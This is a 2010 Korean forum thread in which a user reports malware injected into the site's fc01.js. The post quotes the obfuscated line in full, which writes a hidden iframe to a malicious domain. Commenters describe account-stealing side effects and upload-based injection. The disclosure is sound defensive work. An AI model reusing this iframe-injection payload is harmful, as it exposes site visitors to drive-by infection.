PGR21.com
- 자유 주제로 사용할 수 있는 게시판입니다.
- 토론 게시판의 용도를 겸합니다.
Date 2010/09/18 14:57:54
Name MagnaDea
Subject [일반] pgr21 접속시 악성코드 오류에 대해...
평소 눈팅만 하는 유저라서, 운영진에게 어떻게 연락을 취해야 하는지 몰라 그냥 여기에 글 남깁니다.

현재 pgr21 사이트 접속시 http://ccmtd.com/xx.htm (접속하지 마세요.; 악성코드 사이트입니다.)
페이지에서 악성코드가 감지되었다는 오류가 뜨고 있는데요.
이는 pgr21에서 사용하는 fc01.js 가장 마지막 라인에 있는

window["x64x6fx63x75x6dx65x6ex74"]["x77x72x69x74x65x6cx6e"]("x3cx69x66x72x61x6dx65 x73x72x63x3dx68x74x74x70x3a//x63x63x6dx74x64x2ex63x6fx6d/x78x78x2ex68x74x6d x77x69x64x74x68x3dx30 x68x65x69x67x68x74x3dx30 x73x63x72x6fx6cx6cx69x6ex67x3dx6ex6f x66x72x61x6dx65x62x6fx72x64x65x72x3dx30x3ex3c/x69x66x72x61x6dx65x3e");

위 코드 때문에 생기는 문제입니다.

fc01.js 파일에서 저 라인만 지워주시면 해결됩니다.
예전에 웹프로그래밍 해보았던 경력이 이럴때 도움이 되기도 하는군요.;;
수고하셔요.^^

(글쓰기는 처음해보는 거라 10줄 규정 때문에 살짝 살떨리네요. 10줄 된 거 맞죠?;;)

통합규정 1.3 이용안내 인용

"Pgr은 '명문화된 삭제규정'이 반드시 필요하지 않은 분을 환영합니다.
법 없이도 사는 사람, 남에게 상처를 주지 않으면서 같이 이야기 나눌 수 있는 분이면 좋겠습니다."
준이...
10/09/18 15:05
수정 아이콘
추..추게로???
코리아범
10/09/18 15:07
수정 아이콘
추..추게로???(2)
10/09/18 15:09
수정 아이콘
레..렐루야?!
eldritch
10/09/18 15:05
수정 아이콘
추천 해 드릴려고

100만년만에 로그인 합니다.
레지엔
10/09/18 15:10
수정 아이콘
선추천 후리플....
10/09/18 15:16
수정 아이콘
추천을 안 할 수가 없네요
10/09/18 15:17
수정 아이콘
추천 해 드릴려고

100만년만에 로그인 합니다. (2)
10/09/18 15:21
수정 아이콘
질문및건의 게시판에 올리시면 되요.
10/09/18 15:22
수정 아이콘
크롬 접속시 항상 뜨던게 이것 때문이었군요. 저 역시 추천드려요
10/09/18 15:26
수정 아이콘
덜덜덜......
피트리
10/09/18 15:29
수정 아이콘
http://ccmtd.com/xx.htm
이 주소 피지알에 접속할때 밑에 주소 뜨는거 봤어요
피지알 5번 접속하면 4번은 인터넷창 다 꺼지고 1번만 겨우 들어올수있네요ㅠㅠ
Dreamlike
10/09/18 15:36
수정 아이콘
무...무서워......
저도 추천 해 드릴려고

100만년만에 로그인 합니다. (3)
자유의지
10/09/18 15:37
수정 아이콘
어디 폴더로 들어가야 저 파일이 있는건가요??

temporary folder 인가요?
가짜힙합
10/09/18 15:37
수정 아이콘
대단하시네요!! 추천!!
어떤날
10/09/18 15:54
수정 아이콘
근데 저걸 어떻게 지우나요? ㅠㅠ
10/09/18 15:56
수정 아이콘
전 아침부터 갑자기 피지알 접속을 하면 창이 바로 다운되어 버리네요..

컴에는 아무런 이상이 없는데 말이죠...

그리고 로그인 풀리는 건 언제쯤 해결이 될는지....;;;
길버그
10/09/18 15:51
수정 아이콘
추천!!!
모모리
10/09/18 15:58
수정 아이콘
자기 하드의 파일에서 지우라는 게 아닙니다. 운영자분이 지우실 내용이지용.
RealWorlD
10/09/18 16:02
수정 아이콘
추 to the 천 IT의 위엄
비공개
10/09/18 16:12
수정 아이콘
이런 글은 추천을 해야 제 맛!
StayAway
10/09/18 16:15
수정 아이콘
추천은 했지만 무슨말인지 모르는 1人
10/09/18 16:12
수정 아이콘
추천합니다!
나야돌돌이
10/09/18 16:25
수정 아이콘
다들 추천하는 분위기니 저도 동참하겠지만 무슨말인지 모르는 1人 여기 또 하나있습니다 -_-
10/09/18 16:29
수정 아이콘
저 부분 디코딩 시켜서 무슨 내용인지 관찰하려고 하는데 하는 방법을 모르겠네요
10/09/18 16:32
수정 아이콘
추... 추천..
하얀거탑
10/09/18 16:34
수정 아이콘
우...우앗!!
10/09/18 16:48
수정 아이콘
오...추천 안 드릴 수가 없군요
10/09/18 16:56
수정 아이콘
왠지 추천해야 될거 같은 이 느낌;;
최강희
10/09/18 16:56
수정 아이콘
동참
최종병기캐리어
10/09/18 17:12
수정 아이콘
한동안 조용하더니 다시 또 마구 뜨기 시작하네요.
금시조131267M
10/09/18 17:22
수정 아이콘
우와~ 추천이요~~~

MagnaDea님을 운영진으로~~~~~~~
10/09/18 17:24
수정 아이콘
아바스트에 안잡히는걸 보니 확실히 제거가 됐네요
내려올
10/09/18 17:26
수정 아이콘
이럴 때일수록 추천이 필요합니다.
10/09/18 17:38
수정 아이콘
추천 누르고 갑니...
10/09/18 18:08
수정 아이콘
확인해주셔서 감사합니다.

안타깝게도 fc01.js 파일외에도 문제가 있는 부분이 있는 것 같습니다.
한번 수정했던 파일인데, 다시 감염된걸 보면 어딘가 문제있는 경로로 계속 재 감염이 되는 것 같네요.
파일명을 바꾸어도 재감염이 되는지 보려고 파일명을 바꿔놓고 지켜보려고 합니다.

대신 일반적인 파일의 소유자가 504인데 반해 변조된 파일의 소유자는 48로 되어있는 것을 보고 48로 된 파일을 다수 찾아서 수정했습니다.
여전히 악성코드 안내가 뜨긴 하는데, 좀 더 봐야겠네요.
MagnaDea
10/09/18 18:26
수정 아이콘
all/ 별일아닌데 칭찬해주셔서 몸둘바를 모르겠네요;; 감사합니다.
Toby 님// 네. 일단 제가 지금은 회사라서 집에가서 시간이 좀 나면 더살펴보고 확인해보도록 하겠습니다.
10/09/18 18:52
수정 아이콘
구글크롬 진단페이지에 아래와 같은 내용이 있네요.

이 사이트를 통해 감염된 사이트
지난 90일간 pgr21.com이(가) ppomppu.co.kr/을(를) 포함한 1개의 사이트를 감염시킨 것으로 나타났습니다.

피지알이 뽐뿌를 감염시켰다라... 어떻게 그런일이 가능할지 궁금하네요.
다행히 뽐뿌는 지금은 문제 없이 해결된듯 합니다만
면역결핍
10/09/18 22:08
수정 아이콘
현재 익스플로러로 접속을 하면
프로세스에 a.exe가 실행되고 익스플로러 창이 닫힙니다.
물론 프로세스에는 iexplorer.exe가 남아있구요...
documents and setting사용자application data 폴더에
a.exe를 깔고있습니다.
알려진 바로는 게임계정탈취목적으로 심어둔 듯 합니다. 로그를 빼내서 전송하는 방식인것 같습니다.
제가 던파를 자주하는데 당장에 otp가 뚫리고 보안카드 입력실패를 했더군요.
혹시나 싶어서 피시방에서도 해보니 똑같은 증상이 나타났습니다.
악의적으로 게임계정의 해킹을 목적으로 심어둔 악성코드인것 같습니다.
나무야
10/09/18 22:21
수정 아이콘
저는 파이어폭스로는 계속 접속이 되질 않아서
익스플로러로 접속하네요..
익스는 불편해요. ㅠ.ㅠ
지나가다...
10/09/19 01:02
수정 아이콘
방금 접속했을 때 또 경고 메시지가 뜨면서 www.nstargame.com이란 곳에서 접근한다는 메시지가 뜨네요.

뭔가 또 문제가 생긴 게 아닌가 싶습니다.
귀얇기2mm
10/09/19 04:13
수정 아이콘
Toby 님// 재차 문제가 되는 javascript 코드를 심는 현상이 생긴다면 제로보드 파일 업로드쪽도 의심/점검해 보시는 게 좋을 것 같습니다.

제로보드4 파일 업로드 기능을 악용하여 script 심는 일이 상당히 많았습니다. 가장 흔한 방법이 script가 담긴 가짜 이미지 파일을 올린 뒤 이 파일을 열면(html 에서 img 태그로 여는 식) 지저분한 나쁜 javascript 코드를 기존 서버에 있는 javascript 파일에 심는 겁니다. 만약 서버에서 권한 설정에 허점이 있다면 더 심각한 참사도 생길 수 있지요(이건 아마 패치됐던 걸로...). 제로보드4 보안 패치가 하도 많아서 현재는 완전히 해결됐는지는 모르겠는데, 제가 알기로 제로보드4는 올린 파일이 정말로 이미지 파일인지 아닌지 검사하지 않는 걸로 알고 있습니다.

일전에 어느 분께서 XE로 이전 등을 건의 하셨는데, 운영진들께서 XE이든 다른 최신 게시판이든 익숙해지셔서 제로보드4에서 벗어나길 추천합니다. 제로보드4는 보안 문제도 심각하지만, DB 효율이나 웹단 성능이 상당히 떨어지거든요.
10/09/19 10:59
수정 아이콘
이제는 다른 게시판으로의 전환을 고려해보셔야 할 것 같습니다... 이거 사이트 접속 자체가 위태로워지는 지경이니;;
목록 삭게로! 맨위로
번호 제목 이름 날짜 조회 추천
25201 [일반] 내가 스타2를 사겠다는건, 게임을 열심히 하기 위해서가 아니야. [16] likeade5767 10/09/18 5767 2
25200 [일반] 프로야구 중계 불판 올립니다. [134] EZrock3736 10/09/18 3736 0
25199 [일반] pgr21 접속시 악성코드 오류에 대해... [43] MagnaDea9179 10/09/18 9179 54
25198 [일반] [잡담] 시라노 연애조작단을 보고왔습니다..(스포전혀없음) [18] 이직신5226 10/09/18 5226 0
25197 [일반] 휴대전화 구매하기 [34] 모모리8646 10/09/18 8646 2
25195 [일반] 추신수 선수 한 경기 17,18,19호 홈런~추추 [21] 자유의지6386 10/09/18 6386 0
25194 [일반] 슈퍼스타 K 시즌2가 시청률의 새 역사를 쓰고 있네요. [28] Leeka7757 10/09/18 7757 0
25193 [일반] 슈퍼스타K 그리고 성장 스토리... [18] 혼돈컨트롤5545 10/09/18 5545 0
25192 [일반] 시계를 사볼까?---- 6편 (새로운 시작편) [7] 곰주6293 10/09/18 6293 0
25190 [일반] 돌아오지 않는 마술사 [5] 수선화4396 10/09/18 4396 0
25189 [일반] 4 코드 메들리, 감상하세요. [3] DavidVilla3464 10/09/18 3464 0
25187 [일반] 강승윤에게 기대하는것.. [13] sinfire5366 10/09/18 5366 0
25186 [일반] 슈퍼스타K2. Top11의 나름대로의 평가. [48] 거룩한황제7039 10/09/18 7039 0
25185 [일반] 김그림씨.. 수고하셨습니다. [21] 완성형토스5632 10/09/18 5632 0
25184 [일반] 슈퍼스타K 2 2주차 TOP 8 온라인 사전 투표 (10.09.18 AM 11:30분 수정) 현황~! [61] CrazY_BoY5291 10/09/18 5291 0
25183 [일반] 추억은 무엇일까. [4] nickyo3186 10/09/18 3186 0
25182 [일반] 슈퍼스타k2, 오늘의 히로인들. [78] 풍경7805 10/09/18 7805 0
25180 [일반] 기적을 노래하라! 슈퍼스타 K 시즌 2 - 생방송 1일차 불판 #3 [346] kimbilly14424 10/09/18 14424 0
25179 [일반] 경기도 학생인권조례안 통과 [42] 아유3541 10/09/18 3541 0
25178 [일반] 기적을 노래하라! 슈퍼스타 K 시즌 2 - 생방송 1일차 불판 #2 [277] kimbilly9274 10/09/18 9274 0
25177 [일반] 2010 마구마구 프로야구 9/17(금) 리뷰 & 9/18(토) 프리뷰 [2] 멀면 벙커링3610 10/09/17 3610 0
25176 [일반] 기적을 노래하라! 슈퍼스타 K 시즌 2 - 생방송 1일차 불판 #1 [234] kimbilly8111 10/09/17 8111 0
25175 [일반]  저도.. 스타크래프트2 패키지를 구매했습니다. [11] 김형택3928 10/09/17 3928 0
목록 이전 다음
댓글

+ : 최근 1시간내에 달린 댓글
+ : 최근 2시간내에 달린 댓글
맨 위로